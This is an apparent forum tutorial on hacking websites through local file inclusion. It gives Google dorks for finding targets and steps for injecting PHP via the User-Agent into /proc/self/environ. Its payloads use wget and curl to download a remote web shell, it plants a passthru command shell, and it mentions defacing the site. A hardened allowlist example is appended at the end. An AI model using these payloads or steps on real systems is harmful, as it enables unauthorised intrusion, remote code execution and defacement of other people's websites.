Website Hacking by LFI
LFI AND SHELL UPLOAD WITH TAMPER DATA
The URL of a website vulnerable to LFI (local file inclusion) looks like this:
Code:
www.website.com/index.php?page=/etc/passwd
Few things you need for this method:
1. Firefox
2. Tamper Data
3. Vulnerable Sites
or use these dorks for finding vulnerable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=
Now I'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper Data.
So after selecting a vulnerable website, check /etc/passwd.
Great! Now you are sure that the website is vulnerable.
Now check for /proc/self/environ.
So change your path to /proc/self/environ.
I'm interested in HTTP_USER_AGENT. Now I'm going to change our user agent to try to get data from the site by injecting code where our browser's user agent should be.
To do this, I am going to use Tamper Data. Once you have it installed, go to your options, and go to Tamper Data.
Your page must still be /proc/self/environ.
Click Start Tamper, and refresh your page.
I'll try some code injection.
In the User-Agent field, type this:
<?php phpinfo();?>
Now the vulnerable website is downloading,
Now we can execute code, so let's upload your shell.
Open Tamper Data again, click Start Tamper, and refresh the website. This time, in the User-Agent field, enter this:
<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
It downloads the text file and saves it as a PHP file.
You can upload your shell as a text file using free web hosting...
I already shelled a website, so I am going to use that website as file hosting
When you're done with that, you can access your shell directly by going to http://site/shell.php
If you are getting an error, try using the same method as when you got your
http://www.site.com/index.php?page=/etc/passwd
Upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php
If it loads fine the second time, you can upload your deface using the shell...
When you are done,
Alternate Method:
Some websites have extra precautions to prevent attacks like these,
so use this alternate method.
Change your user agent to:
<? passthru($_GET['cmd']); ?>
Now load the website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
Your URL should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php
Now, hopefully, your shell is uploaded.
Null Bytes
Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
Here's what the code looks like that makes it vulnerable:
<?php
// Deliberately vulnerable: the request parameter reaches include() without any validation.
$file = $_GET['file'];
if(isset($file))
{
    include("pages/$file");
}
else
{
    include("index.php");
}
?>
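A hardened form of the vulnerable include above, as an added example that is not code from the original post: the request value is only ever used as a key into a fixed allowlist, so strings such as /etc/passwd or /proc/self/environ never reach include(). The page names, file names and the PAGES_DIR location are assumptions.

```php
<?php
// Added example (not from the original post): hardened replacement for the
// vulnerable include. Page names, file names and PAGES_DIR are assumptions.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: request value => file under PAGES_DIR. Nothing else is served.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map an untrusted page name to an absolute path, or null if it is not allowed.
 */
function resolve_page(string $name): ?string
{
    // The user-supplied string is used only as an array key, never as a path.
    if (!array_key_exists($name, PAGES)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$name]);
    // Defence in depth: after symlinks are resolved, the file must still sit
    // inside PAGES_DIR (guards against a symlink planted in the directory).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// ?file[]=x arrives as an array, so accept strings only.
$requested = $_GET['file'] ?? 'home';
$path = is_string($requested) ? resolve_page($requested) : null;

if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

Setting open_basedir to the application directory in php.ini adds a second barrier, since paths under /proc and /etc then fail to open even if a vulnerable include remains elsewhere in the code base.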
code simply rocks and very very simple.